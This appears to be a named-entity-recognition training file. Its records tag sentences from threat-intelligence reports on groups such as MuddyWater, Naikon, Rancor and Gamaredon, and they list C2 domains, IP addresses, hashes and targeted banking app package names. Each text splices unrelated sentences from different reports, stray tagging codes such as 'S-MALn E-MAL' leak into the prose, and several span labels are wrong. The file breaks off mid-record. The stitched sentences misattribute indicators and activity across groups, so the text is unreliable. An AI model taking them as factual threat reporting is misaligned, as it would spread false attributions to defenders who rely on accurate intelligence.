{"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater . MOF files are compiled scripts that describe Common Information Model ( CIM ) classes , which are compiled into the WMI repository . Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": [{"start": 36, "end": 60, "label": "System"}, {"start": 72, "end": 115, "label": "System"}, {"start": 132, "end": 141, "label": "System"}, {"start": 202, "end": 213, "label": "Organization"}, {"start": 349, "end": 372, "label": "Organization"}, {"start": 375, "end": 384, "label": "System"}, {"start": 420, "end": 444, "label": "System"}, {"start": 447, "end": 450, "label": "System"}, {"start": 491, "end": 494, "label": "System"}, {"start": 519, "end": 532, "label": "Organization"}, {"start": 537, "end": 551, "label": "System"}, {"start": 556, "end": 586, "label": "Organization"}, {"start": 641, "end": 653, "label": "Malware"}, {"start": 691, "end": 711, "label": "System"}]}
{"text": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products . In this latest activity , BlackWater first added an obfuscated Visual Basic for Applications ( VBA ) script to establish persistence as a registry key . The technique is described by MITRE S-SECTEAM ATT&CK IDT1084 . The actors appear to target victims in Kuwait , as the ransom note demands payment in Kuwaiti dinar before translating that sum to its U.S. dollar equivalent in Bitcoin .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 169, "end": 198, "label": "System"}, {"start": 201, "end": 204, "label": "System"}, {"start": 289, "end": 319, "label": "System"}, {"start": 361, "end": 367, "label": "Organization"}]}
{"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater . This particular MOF file creates a timer event that is triggered every five seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 281, "end": 304, "label": "Organization"}, {"start": 323, "end": 331, "label": "System"}, {"start": 539, "end": 569, "label": "Indicator"}]}
{"text": "Open Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East . The DLL located in the Media registry key is a variant of the KHRAT Troja S-MALn E-MAL . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 143, "end": 153, "label": "Organization"}, {"start": 272, "end": 275, "label": "System"}, {"start": 291, "end": 305, "label": "System"}, {"start": 330, "end": 335, "label": "Malware"}, {"start": 336, "end": 354, "label": "Malware"}, {"start": 507, "end": 532, "label": "System"}]}
{"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au.su Homevideo2-12l.ml videohosting1-5j.gq URLs hxxp : //88.99.227 [ . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) . It beacons to domain connect.bafunpda.xyz and attempts to connect to TCP port 4433 . They once attacked a game server to illicitly farm in - game currency ( \u201c gaming gold \u201d , which also has real - world value ) and stole source codes of online game projects .", "spans": [{"start": 64, "end": 81, "label": "Indicator"}, {"start": 82, "end": 101, "label": "Indicator"}, {"start": 107, "end": 129, "label": "Indicator"}, {"start": 173, "end": 202, "label": "System"}, {"start": 287, "end": 306, "label": "System"}, {"start": 378, "end": 383, "label": "Organization"}, {"start": 437, "end": 457, "label": "Indicator"}, {"start": 485, "end": 488, "label": "Indicator"}]}
{"text": "] 26/html2/2018/GrafKey/new-inj-135-3-dark.html hxxp : //88.99.227 [ . Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations . This is the same domain used by the KHRAT S-MAL Trojan E-MAL . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 48, "end": 70, "label": "Indicator"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 238, "end": 249, "label": "Malware"}, {"start": 250, "end": 262, "label": "Malware"}]}
{"text": "] 26/html2/arc92/au483x.zip hxxp : //94.130.106 [ . Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group . Rancor , a cyber espionage group active since at least 2017 , continues to conduct targeted attacks in Southeast Asia E-LOC and has been found using an undocumented , custom malware family \u2013 which we \u2019ve dubbed Dudell \u2013 to download a second stage payload once its malicious macro is executed . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": [{"start": 28, "end": 51, "label": "Indicator"}, {"start": 93, "end": 103, "label": "Organization"}, {"start": 229, "end": 239, "label": "Organization"}, {"start": 240, "end": 258, "label": "Organization"}, {"start": 261, "end": 267, "label": "Organization"}, {"start": 472, "end": 478, "label": "Malware"}, {"start": 581, "end": 592, "label": "Organization"}, {"start": 673, "end": 689, "label": "Vulnerability"}]}
{"text": "] 117:8080/api/v1/report/records.php hxxp : //88.99.227 [ . Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" . Additionally , Rancor is also using the Derusbi malware family to load a secondary payload once it infiltrates a target . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": [{"start": 37, "end": 59, "label": "Indicator"}, {"start": 104, "end": 116, "label": "Organization"}, {"start": 123, "end": 142, "label": "System"}, {"start": 179, "end": 189, "label": "Organization"}, {"start": 306, "end": 312, "label": "Organization"}, {"start": 331, "end": 338, "label": "Malware"}, {"start": 413, "end": 434, "label": "Organization"}]}
{"text": "] 26/html2/new-inj-135-3-white.html hxxp : //facebook-photos-au [ . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . Rancor : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . SecretsDump A publicly available tool that can perform various techniques to dump secrets from the remote machine without executing any agent .", "spans": [{"start": 36, "end": 67, "label": "Indicator"}, {"start": 95, "end": 108, "label": "System"}, {"start": 111, "end": 124, "label": "Vulnerability"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 234, "end": 298, "label": "Indicator"}, {"start": 301, "end": 312, "label": "System"}]}
{"text": "] su/ChristinaMorrow hxxp : //homevideo2-12l [ . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did . Rancor : AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 . Ashley Madison \u2019s parent company \u2014 Toronto - based Avid Life Media \u2014 filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": [{"start": 21, "end": 48, "label": "Indicator"}, {"start": 206, "end": 212, "label": "Organization"}, {"start": 215, "end": 279, "label": "Indicator"}, {"start": 282, "end": 314, "label": "Organization"}, {"start": 333, "end": 348, "label": "Organization"}, {"start": 440, "end": 455, "label": "Organization"}]}
{"text": "] ml/mms3/download_3.php IP addresses 78.46.201.36 88.99.170.84 88.99.227.26 94.130.106.117 88.99.174.200 88.99.189.31 Hash 369fcf48c1eb982088c22f86672add10cae967af82613bee6fb8a3669603dc48 b2d4fcf03c7a8bf135fbd3073bea450e2e6661ad8ef2ab2058a3c04f81fc3f3e The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China . Rancor : 0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E . The 2015 and 2016 Ukraine blackout events each featured several discrete disruptive events against the OT environment ( e.g. , disabling UPS systems , bricking serial - to - ethernet converters , conducting a DoS attack against a SIPROTEC relay , wiping OT systems , etc . ) .", "spans": [{"start": 38, "end": 50, "label": "Indicator"}, {"start": 51, "end": 63, "label": "Indicator"}, {"start": 64, "end": 76, "label": "Indicator"}, {"start": 77, "end": 91, "label": "Indicator"}, {"start": 92, "end": 105, "label": "Indicator"}, {"start": 106, "end": 118, "label": "Indicator"}, {"start": 124, "end": 188, "label": "Indicator"}, {"start": 189, "end": 253, "label": "Indicator"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 330, "end": 349, "label": "Organization"}, {"start": 354, "end": 386, "label": "Organization"}, {"start": 528, "end": 534, "label": "Organization"}, {"start": 537, "end": 601, "label": "Indicator"}]}
{"text": "8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6 The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . Rancor : DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E . Then , it is called passing reused allocated memory and not a pointer to structure .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 199, "end": 210, "label": "Organization"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 405, "end": 421, "label": "Organization"}, {"start": 470, "end": 476, "label": "Organization"}, {"start": 479, "end": 543, "label": "Indicator"}]}
{"text": "89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 . Rancor : CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A . These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 344, "end": 350, "label": "Organization"}, {"start": 472, "end": 478, "label": "Organization"}, {"start": 481, "end": 545, "label": "Indicator"}, {"start": 599, "end": 611, "label": "Malware"}]}
{"text": "1819d2546d9c9580193827c0d2f5aad7e7f2856f7d5e6d40fd739b6cecdb1e9e b213c1de737b72f8dd7185186a246277951b651c64812692da0b9fdf1be5bf15 453e7827e943cdda9121948f3f4a68d6289d09777538f92389ca56f6e6de03f0 0246dd4acd9f64ff1508131c57a7b29e995e102c74477d5624e1271700ecb0e2 The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal . Rancor : BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 336, "end": 355, "label": "Organization"}, {"start": 360, "end": 392, "label": "Organization"}, {"start": 506, "end": 512, "label": "Organization"}, {"start": 515, "end": 579, "label": "Indicator"}]}
{"text": "88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . Rancor : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 265, "end": 278, "label": "Malware"}, {"start": 328, "end": 341, "label": "Malware"}, {"start": 362, "end": 375, "label": "Vulnerability"}, {"start": 533, "end": 539, "label": "Organization"}, {"start": 542, "end": 606, "label": "Indicator"}, {"start": 621, "end": 633, "label": "Malware"}]}
{"text": "6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine . Rancor : cswksfwq.kfesv.xyz . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 107, "end": 124, "label": "Indicator"}, {"start": 125, "end": 146, "label": "Indicator"}, {"start": 147, "end": 182, "label": "Indicator"}, {"start": 183, "end": 206, "label": "Indicator"}, {"start": 207, "end": 226, "label": "Indicator"}, {"start": 227, "end": 250, "label": "Indicator"}, {"start": 251, "end": 267, "label": "Indicator"}, {"start": 268, "end": 296, "label": "Indicator"}, {"start": 297, "end": 325, "label": "Indicator"}, {"start": 333, "end": 339, "label": "Organization"}, {"start": 351, "end": 361, "label": "System"}, {"start": 430, "end": 436, "label": "Organization"}, {"start": 439, "end": 457, "label": "Indicator"}, {"start": 460, "end": 571, "label": "Vulnerability"}]}
{"text": "com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661 It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . Rancor : Connect.bafunpda.xyz . The archive contained a RAR SFX which installed the malware and showed an empty PDF decoy .", "spans": [{"start": 0, "end": 17, "label": "Indicator"}, {"start": 58, "end": 82, "label": "Indicator"}, {"start": 83, "end": 105, "label": "Indicator"}, {"start": 106, "end": 123, "label": "Indicator"}, {"start": 124, "end": 151, "label": "Indicator"}, {"start": 152, "end": 162, "label": "Indicator"}, {"start": 163, "end": 179, "label": "Indicator"}, {"start": 180, "end": 207, "label": "Indicator"}, {"start": 208, "end": 232, "label": "Indicator"}, {"start": 233, "end": 255, "label": "Indicator"}, {"start": 256, "end": 271, "label": "Indicator"}, {"start": 272, "end": 310, "label": "Indicator"}, {"start": 311, "end": 351, "label": "Indicator"}, {"start": 408, "end": 417, "label": "Organization"}, {"start": 425, "end": 439, "label": "System"}, {"start": 588, "end": 594, "label": "Organization"}, {"start": 597, "end": 617, "label": "Indicator"}]}
{"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid In addition to stealing keystrokes , Naikon also intercepted network traffic . Rancor : 199.247.6.253 . Note : The default log rotation configuration on NetScaler allows 25 files per log type ( e.g. , ns.log ) and 100 Kilobytes per log , therefore recording 2.5 megabytes in total .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 13, "end": 36, "label": "Indicator"}, {"start": 37, "end": 68, "label": "Indicator"}, {"start": 69, "end": 87, "label": "Indicator"}, {"start": 88, "end": 108, "label": "Indicator"}, {"start": 109, "end": 125, "label": "Indicator"}, {"start": 126, "end": 143, "label": "Indicator"}, {"start": 144, "end": 161, "label": "Indicator"}, {"start": 162, "end": 184, "label": "Indicator"}, {"start": 185, "end": 209, "label": "Indicator"}, {"start": 210, "end": 225, "label": "Indicator"}, {"start": 226, "end": 241, "label": "Indicator"}, {"start": 242, "end": 265, "label": "Indicator"}, {"start": 266, "end": 288, "label": "Indicator"}, {"start": 289, "end": 301, "label": "Indicator"}, {"start": 302, "end": 326, "label": "Indicator"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 406, "end": 412, "label": "Organization"}, {"start": 415, "end": 428, "label": "Indicator"}, {"start": 438, "end": 518, "label": "Indicator"}, {"start": 541, "end": 607, "label": "Indicator"}]}
{"text": "com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work . Cyberwarfare : A deep dive into the latest Gamaredon Espionage Campaign . The memory dump file can be processed offline by the threat actor to extract credentials .", "spans": [{"start": 0, "end": 18, "label": "Indicator"}, {"start": 19, "end": 38, "label": "Indicator"}, {"start": 39, "end": 59, "label": "Indicator"}, {"start": 60, "end": 76, "label": "Indicator"}, {"start": 77, "end": 91, "label": "Indicator"}, {"start": 92, "end": 110, "label": "Indicator"}, {"start": 111, "end": 133, "label": "Indicator"}, {"start": 134, "end": 157, "label": "Indicator"}, {"start": 158, "end": 181, "label": "Indicator"}, {"start": 182, "end": 193, "label": "Indicator"}, {"start": 194, "end": 206, "label": "Indicator"}, {"start": 207, "end": 226, "label": "Indicator"}, {"start": 227, "end": 255, "label": "Indicator"}, {"start": 256, "end": 286, "label": "Indicator"}, {"start": 287, "end": 309, "label": "Indicator"}, {"start": 310, "end": 331, "label": "Indicator"}, {"start": 547, "end": 556, "label": "Organization"}]}
{"text": "eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT . Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB ( Federal Security Service ) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power . Siamesekitten has been active since 2018 and has in the past targeted oil , gas , and telecom companies .", "spans": [{"start": 0, "end": 30, "label": "Indicator"}, {"start": 31, "end": 52, "label": "Indicator"}, {"start": 53, "end": 70, "label": "Indicator"}, {"start": 71, "end": 93, "label": "Indicator"}, {"start": 94, "end": 136, "label": "Indicator"}, {"start": 137, "end": 178, "label": "Indicator"}, {"start": 179, "end": 207, "label": "Indicator"}, {"start": 208, "end": 230, "label": "Indicator"}, {"start": 231, "end": 255, "label": "Indicator"}, {"start": 256, "end": 283, "label": "Indicator"}, {"start": 284, "end": 327, "label": "Indicator"}, {"start": 328, "end": 343, "label": "Indicator"}, {"start": 344, "end": 356, "label": "Indicator"}, {"start": 444, "end": 454, "label": "Organization"}, {"start": 457, "end": 466, "label": "Organization"}, {"start": 529, "end": 541, "label": "Organization"}, {"start": 544, "end": 568, "label": "Organization"}, {"start": 639, "end": 659, "label": "Organization"}, {"start": 719, "end": 732, "label": "Organization"}, {"start": 789, "end": 822, "label": "Organization"}]}
{"text": "com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" . Gamaredon has been active since 2014 , and during this time , the modus operandi has remained almost the same . The lure contains a payment instruction form containing VBA code , which appears to have been sent from the State Treasury Service of Ukraine .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 21, "end": 43, "label": "Indicator"}, {"start": 44, "end": 57, "label": "Indicator"}, {"start": 58, "end": 75, "label": "Indicator"}, {"start": 76, "end": 91, "label": "Indicator"}, {"start": 92, "end": 113, "label": "Indicator"}, {"start": 114, "end": 141, "label": "Indicator"}, {"start": 142, "end": 164, "label": "Indicator"}, {"start": 165, "end": 194, "label": "Indicator"}, {"start": 195, "end": 214, "label": "Indicator"}, {"start": 215, "end": 229, "label": "Indicator"}, {"start": 230, "end": 248, "label": "Indicator"}, {"start": 249, "end": 277, "label": "Indicator"}, {"start": 278, "end": 299, "label": "Indicator"}, {"start": 300, "end": 317, "label": "Indicator"}, {"start": 354, "end": 366, "label": "Organization"}, {"start": 391, "end": 396, "label": "Organization"}, {"start": 411, "end": 419, "label": "Organization"}, {"start": 424, "end": 433, "label": "Organization"}, {"start": 640, "end": 677, "label": "Organization"}]}
{"text": "com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" . The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 16, "end": 28, "label": "Indicator"}, {"start": 29, "end": 44, "label": "Indicator"}, {"start": 45, "end": 59, "label": "Indicator"}, {"start": 60, "end": 85, "label": "Indicator"}, {"start": 86, "end": 124, "label": "Indicator"}, {"start": 125, "end": 156, "label": "Indicator"}, {"start": 157, "end": 176, "label": "Indicator"}, {"start": 177, "end": 200, "label": "Indicator"}, {"start": 201, "end": 228, "label": "Indicator"}, {"start": 229, "end": 249, "label": "Indicator"}, {"start": 250, "end": 267, "label": "Indicator"}, {"start": 268, "end": 295, "label": "Indicator"}, {"start": 296, "end": 316, "label": "Indicator"}, {"start": 371, "end": 377, "label": "Organization"}, {"start": 382, "end": 390, "label": "Organization"}, {"start": 446, "end": 458, "label": "Organization"}, {"start": 465, "end": 484, "label": "System"}, {"start": 529, "end": 539, "label": "Malware"}, {"start": 543, "end": 550, "label": "Malware"}, {"start": 580, "end": 588, "label": "Malware"}, {"start": 679, "end": 696, "label": "Organization"}, {"start": 745, "end": 755, "label": "System"}]}
{"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk . It is distributed in a spear phishing campaign with a weaponized of\ufb01ce document that appears to be designed to lure military personnel . The injected code calls out a first domain ( seen above encoded in Base64 ) and generates a Base64 response : Decoding it reveals a URL pointing to the actual skimming code , which is heavily obfuscated ( likely via obfuscator.io ): The data exfiltration is also done differently as seen in the image below .", "spans": [{"start": 0, "end": 24, "label": "Indicator"}, {"start": 25, "end": 50, "label": "Indicator"}, {"start": 51, "end": 79, "label": "Indicator"}, {"start": 80, "end": 119, "label": "Indicator"}, {"start": 120, "end": 159, "label": "Indicator"}, {"start": 160, "end": 195, "label": "Indicator"}, {"start": 196, "end": 245, "label": "Indicator"}, {"start": 246, "end": 280, "label": "Indicator"}, {"start": 281, "end": 308, "label": "Indicator"}, {"start": 309, "end": 333, "label": "Indicator"}, {"start": 334, "end": 358, "label": "Indicator"}, {"start": 359, "end": 367, "label": "System"}, {"start": 465, "end": 483, "label": "Organization"}, {"start": 496, "end": 504, "label": "Organization"}, {"start": 507, "end": 516, "label": "Organization"}, {"start": 519, "end": 525, "label": "Organization"}, {"start": 531, "end": 538, "label": "Organization"}, {"start": 606, "end": 611, "label": "System"}, {"start": 788, "end": 880, "label": "Indicator"}, {"start": 894, "end": 907, "label": "System"}]}
{"text": "de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb PROMETHIUM is an activity group that has been active as early as 2012 . In the recent months , Ukrainian CERT ( CERT-UA ) reported an intensi\ufb01cation of Gamaredon B-ACT S-APT Cyberattacks against military targets . The Aclip backdoor uses the Slack API to send system data , files , and screenshots to the C2 while receiving PowerShell commands at the same time .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}, {"start": 17, "end": 36, "label": "Indicator"}, {"start": 37, "end": 65, "label": "Indicator"}, {"start": 66, "end": 101, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}, {"start": 111, "end": 135, "label": "Indicator"}, {"start": 136, "end": 164, "label": "Indicator"}, {"start": 165, "end": 198, "label": "Indicator"}, {"start": 199, "end": 235, "label": "Indicator"}, {"start": 236, "end": 250, "label": "Indicator"}, {"start": 251, "end": 286, "label": "Indicator"}, {"start": 287, "end": 304, "label": "Indicator"}, {"start": 305, "end": 332, "label": "Indicator"}, {"start": 333, "end": 343, "label": "Organization"}, {"start": 350, "end": 364, "label": "Organization"}, {"start": 428, "end": 442, "label": "Organization"}, {"start": 445, "end": 452, "label": "Organization"}, {"start": 551, "end": 565, "label": "Malware"}, {"start": 575, "end": 584, "label": "System"}]}
{"text": "com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years . The new wave dates back to the end of November 2019 and was \ufb01rst analyzed by Vitali Kremez . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 \u2019s domain for hosting his own private blog .", "spans": [{"start": 0, "end": 28, "label": "Indicator"}, {"start": 29, "end": 47, "label": "Indicator"}, {"start": 48, "end": 64, "label": "Indicator"}, {"start": 65, "end": 92, "label": "Indicator"}, {"start": 93, "end": 122, "label": "Indicator"}, {"start": 123, "end": 142, "label": "Indicator"}, {"start": 143, "end": 163, "label": "Indicator"}, {"start": 164, "end": 185, "label": "Indicator"}, {"start": 186, "end": 200, "label": "Indicator"}, {"start": 201, "end": 220, "label": "Indicator"}, {"start": 221, "end": 233, "label": "Indicator"}, {"start": 234, "end": 248, "label": "Indicator"}, {"start": 249, "end": 265, "label": "Indicator"}, {"start": 266, "end": 277, "label": "Indicator"}, {"start": 278, "end": 306, "label": "Indicator"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 332, "end": 340, "label": "System"}, {"start": 529, "end": 545, "label": "Indicator"}, {"start": 560, "end": 568, "label": "Indicator"}, {"start": 580, "end": 597, "label": "Organization"}]}
{"text": "com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . Starting from those \ufb01ndings , Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant . In addition , Hack520 \u2019s tweets always show photos of the same animal , which is likely his pet pig .", "spans": [{"start": 0, "end": 18, "label": "Indicator"}, {"start": 19, "end": 39, "label": "Indicator"}, {"start": 40, "end": 59, "label": "Indicator"}, {"start": 60, "end": 79, "label": "Indicator"}, {"start": 80, "end": 99, "label": "Indicator"}, {"start": 100, "end": 115, "label": "Indicator"}, {"start": 116, "end": 146, "label": "Indicator"}, {"start": 147, "end": 178, "label": 